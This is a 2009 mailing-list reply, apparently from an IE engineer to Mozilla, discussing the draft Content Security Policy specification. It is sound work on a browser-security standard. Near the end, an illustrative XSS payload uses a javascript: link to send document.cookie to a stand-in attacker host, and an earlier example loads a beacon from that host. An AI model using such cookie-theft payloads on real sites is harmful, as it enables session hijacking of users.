I'm not sure about Usenet etiquette (it's been years), so I'll try
replying inline for now.  :-)

On Jul 6, 3:02 am, Gervase Markham <g...@mozilla.org> wrote:
> Hi Eric,
>
> Some really, really great points here. My thoughts on some of them:
>
> On 06/07/09 01:28, EricLaw wrote:
> > Server CSP Versioning
> > Can the server define which version of CSP policies it wants to use,
> > allowing the client to ignore?  I know that backward compatibility is
> > the goal, but other successful features (E.g. Cookies) have had tons
> > of problems here as they try to evolve.  The current “Handling parse
> > errors” section imposes a number of requirements that might be onerous
> > in the distant future when we’re on version 5 of the CSP feature.
>
> >
> > User-Agent header
> > What’s the use-case for adding a new token to the user-agent header?
> > It’s already getting pretty bloated (at least in IE) and it’s hard to
> > imagine what a server would do differently when getting this token.
>
> I also haven't quite got this straight in my head.
>
> I think it would be useful for the spec to contain a lot more detail on
> what it hopes to achieve with the current versioning system - scenarios
> where it would be useful, scenarios where it won't help, and so on - and
> also why we decided not to put a version number in the CSP response itself.
>
> > Style-src
> > I don’t know what “style attributes of HTML elements” means.
>
> It means <div style="some CSS here"></div>

That's what I figured, but I'm not sure I understand how CSP applies.
Is it applying to url() statements (if any) that are inlined in the
style attribute?  Or is there some other way that the style attribute
allows retrieval of remote content?
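
For example (my own illustration, not from the spec), markup like
this would trigger a remote fetch purely via the style attribute:

    <div style="background-image: url(http://attacker.example/beacon.png)">
      hello
    </div>

If style-src is only meant to govern loads like that one, it would be
good for the spec to say so explicitly.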

> > frame-ancestors
> > In addition to IFRAMEs/FRAME tags, this should also restrict OBJECT
> > tags that point to HTML pages, correct?
>
> I guess so :-)
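
For the record, the case I had in mind was something like (URLs
hypothetical):

    <object type="text/html" data="http://victim.example/secret.html"></object>

...which embeds the target document just as effectively as an IFRAME
would, so frame-ancestors presumably ought to cover it too.
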
>
> > W3C folks have been giving us (IE) a hard time about the number (and
> > scattered documentation) of X- header names
> >http://blogs.msdn.com/ieinternals/archive/2009/06/30/Internet-Explore...,
> > and they’ve strongly encouraged us to register our header names (even
> > provisionally) with IANA
> > http://www.iana.org/assignments/message-headers/message-header-index....
> > rather than using the X- prefix.
>
> I'm sure we can do that, particularly if we have buy-in or tacit support
> from multiple browser vendors. We are early in a Firefox development
> cycle, so we do have time.
>
> > HTTP Header: Final
> > It seems like it might be useful for a CSP Header to declare that it’s
> > the “Final” security policy, to prevent meddling by META Header
> > injection and the like.
>
> The very existence of "meta" is now under discussion. But I think that
> if we do implement a merging algorithm (which I think we should, albeit
> for multiple headers) a "final" directive might be useful.


Dropping META support has its merits, but it would mean one couldn't
use CSP with any protocol that doesn't allow for headers (FTP, FILE,
etc.).
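
If a "final" directive were added, I'd imagine something along these
lines (syntax entirely hypothetical):

    X-Content-Security-Policy: allow 'self'; img-src *.example.com; final

...where the UA would ignore any subsequently-encountered META policy
rather than attempting to merge it.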


> > Are relative URIs valid for the report-URI/policy-URI?  (Seems like
> > this would be a good thing to support). However, if so, is there any
> > interaction/relationship with the BASE tag, which is supposed to also
> > appear early in the head?
>
> Very good question.
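
To make the ambiguity concrete (markup hypothetical), consider:

    <base href="http://cdn.example/">
    <meta http-equiv="X-Content-Security-Policy"
          content="allow 'self'; report-uri /csp-report">

Does /csp-report resolve against the document's own origin, or
against the BASE?  Either tag could legally appear first in HEAD, so
ordering matters too.
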
>
> > What happens to CSP if I save a CSP-protected document to my local
> > disk?  I’d assume it would be ignored (because many restrictions could
> > be broken) but this should be explicit.  Also, when saving docs to
> > disk, HTTP headers are lost, so to preserve it, you’d need to
> > explicitly serialize to a META tag, which could get complicated if the
> > document already had a CSP META…
>
> Another good one. Gut reaction: The things CSP is supposed to help with
> are mostly connected with the page being loaded from a particular target
> site. If it's no longer being loaded from that site, many of them go
> away. So I think the answer is that CSP protection is removed. We
> currently restrict HTML loaded from the local disk from accessing other
> files on the local disk, but not in other ways.
>
> > Therefore, a site could specify “*.example.com” to match
> > “www.example.com” and “example.com”.
>
> Hmm. For people not thinking, this would obey the Rule of Least
> Surprise, but for people thinking, it would not obey that rule. <sigh>
>
> > Doesn’t make sense to me, because “self” is defined to include the
> > scheme.  This suggests that we need a "selfhost" directive, which
> > includes the hostname only.
>
> Or we make the same word serve two purposes, doing the "obvious" thing.
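
Concretely, my reading of the proposal is that a single entry would
match like so (illustrative, not spec text):

    allow *.example.com

    matches:        www.example.com, a.b.example.com, example.com
    doesn't match:  example.com.evil.com, myexample.com

It's that last bare "example.com" match that breaks the usual
DNS-style wildcard intuition.
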
>
> > Parse Errors: Server detection
> > Parse errors are defined as only being reported on the client.  This
> > is probably reasonable, but leads to the possibility that some UA will
> > fail to parse some CSP directive and the server operator will not know
> > about it.
>
> Will this be a problem in practice, given that presumably the server
> owner tests their site with a variety of UAs? We don't ping server
> owners to say "your HTML is unparseable", after all. That would rather
> increase the amount of traffic on the Internet! ;-)


True enough.  :-)


> > If the “Fail closed” model is used, is there any way for the user to
> > know why the site is broken?  Isn’t this going to create a problem,
> > where, say, a FF4 user will “downgrade” to a browser that doesn’t
> > support CSP (say, Opera 9) because the site “works properly there”?
> > Everyone loses.
>
> This is a problem with a "tighten when the header is used, and then use
> directives to loosen" approach. Content Restrictions had the opposite
> approach - it started with loose (i.e. the situation as it is without CR
> support) and tightened using directives. This avoided this problem. Of
> course, both directions have pros and cons.


Oh, I think Fail Closed is a fine model, but unless there's some way
for the user to know why the page is completely busted, it seems
likely that they're going to blame the properly-behaving UA rather
than the site.  Pretty much the same problem one encounters with
strict XHTML validation failure -- how do you ensure that the user
blames the site, not the UA?


> > Agreeing with Sacolcor, I think the spec should explicitly note that
> > CSP isn’t intended to apply to User-Scripts, although I think the
> > Greasemonkey guys might find it hard to implement their current
> > feature-set considering where CSP is likely to be implemented in the
> > browser stacks.
>
> We need to avoid breaking Greasemonkey/GreasemonkIE.
>
> > Scope Creep: exempt HEAD
> > We’ve had some folks suggest that CSP-like schemes would be more
> > easily deployed if they could allow arbitrary script/css to be
> > embedded inline/referenced in the HEAD tag.
>
> Yes; CR originally had a way to allow this. I think it would make
> converting sites quite a bit easier.
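
If that exemption came back, I could imagine it as a policy option
along these lines (syntax purely hypothetical):

    X-Content-Security-Policy: allow 'self'; options exempt-head

...meaning inline script/style inside HEAD would run as it does
today, while everything in BODY stays locked down.
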
>
> > In particular, this could be used by non-JS responses to explicitly
> > prevent them from being used by SCRIPT tags, and to prevent HTML files
> > from being scraped by liberal CSS parsers.  This is an anti-CSRF ASR
> > (attack-surface reduction).
>
> I think using CSP should also mean that the scripts which are permitted
> have to be served with the correct content type. As others have said,
> this prevents people using E4X and some user content elsewhere in the
> same domain to inject script which is actually an HTML page.


Oh, sure, but the scenario I'm trying to cover is the case where a
cross-domain attacker's site (not using CSP) is trying to steal (via
E4X, Script Inclusion, CSS style enumeration, etc.) content from the
victim site (which uses CSP on all of its pages).  Unless there's some
way for a resource (e.g. a script, CSS, HTML page) to enforce that its
content can only be accessed by appropriate tags (e.g. refuse to load
a text/html document in response to a <LINK rel=stylesheet> query),
data theft (leading to CSRF) is possible.

After we shipped it, a major web property requested that the
"X-Content-Type-Options: nosniff" directive work like this to protect
against some threat vectors they were facing.
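
Roughly, the shape of that request: a sensitive response would be
served as

    HTTP/1.1 200 OK
    Content-Type: text/html
    X-Content-Type-Options: nosniff

...and a UA honoring the stricter interpretation would refuse to
consume that response via <script src> or <link rel=stylesheet>,
because the declared type doesn't match the consuming context.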

> > Scope Creep: Same Origin Only
> > The claim “Content Security Policy enables a site to specify which
> > sites may embed a resource” is currently over-broad, but it shouldn’t
> > be.  (CSP currently seems to only apply to HTML documents, not
> > "resources" in general).
>
> Yes, we need to think more about how CSP applies to non-HTML and
> non-HTTP resources.
>
> > It seems natural that a subdownload should be able to say e.g.
> > Content-Security-Policy: callers <originlist>  which would cause the UA
> > network stack to refuse to process (e.g. Set-Cookie) or return the
> > content (to a script tag, object tag, image tag, XHR request etc)
> > unless the Origin of the requestor matches the specified Origin list.
>
> People have wanted the web to do this for years to prevent people
> leaching e.g. image bandwidth, but I'm not convinced it would be a great
> thing for the web. It seems to me that this sort of behaviour is a
> regrettable side effect of an open web, but one we should just live with.


I think I understand the concerns (similar to those voiced by folks
who think frame-busters like X-Frame-Options or CSP's
"frame-ancestors" directive are a bad idea, because they break sites that
want to frame content they don't own).  But I think there's a very
legitimate case to be made for the potential security value in
preventing unexpected cross-domain data reads.
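
To illustrate (header name and syntax hypothetical), a subresource
could answer:

    X-Content-Security-Policy: callers https://app.example.com

...and the UA's network stack would fetch it but decline to hand the
body to a script/object/image tag or an XHR, or to process its
Set-Cookie, unless the requesting page's Origin appears in that list.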

> > I’m not fully convinced that the “Origin” proposal (or at least the
> > versions I’ve read closely) will prove generally workable.  Among
> > other problems, every protected resource would need to be served with
> > a Vary: Origin header, which is problematic for a number of reasons,
> > including legacy IE bugs
> > (http://blogs.msdn.com/ieinternals/archive/2009/06/17/9769915.aspx).
>
> Presumably you've sent that feedback in the relevant direction?


I haven't been keeping up on the progress of the Origin proposal, but
I did ask some probing questions in this vein a long time ago.  I was
hoping that we'd be able to come up with a different approach which
offers improved security / deployability properties, and I think CSP
might do just that with a few tweaks.


> > ---------------
> > Feedback from others
> > ---------------
> > ASP.NET Controls
> > Apparently, ASP.NET controls are tightly bound to use of JavaScript:
> > protocol URIs, and this isn’t likely to be easily changed.  For that
> > reason, it might be interesting to have a way to allow only those URIs
> > and not inline script blocks, event handlers, etc?
>
> I know nothing about ASP.NET controls. Are these pre-built blocks of
> HTML that can be included in a page when it's built with ASP?


Yeah, that's the basic idea, I think (I know very little about ASP.NET
myself): the dev/designer uses the IDE to drop an "HTML component"
onto the page (e.g. a date-picker), and the toolkit emits the
HTML/script which implements the functionality of the control.

> I guess the question is: have we effectively blown up all the protection
> if we allow javascript: URIs? Can every possible exploitation method be
> adapted to use them?

Well, I think the obvious threat is that a bad guy who finds an XSS
hole can inject an <A> tag whose href points to a JavaScript URI, but
this seems to represent a subset of all possible attacks, and may be
significantly less compelling to the attacker.
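
E.g., an injected payload along these lines (illustrative only):

    <a href="javascript:(new Image).src='//attacker.example/c?'+escape(document.cookie)">Free iPod!</a>

It still requires the victim to click, which is exactly why it's a
less compelling primitive than an auto-running inline script block.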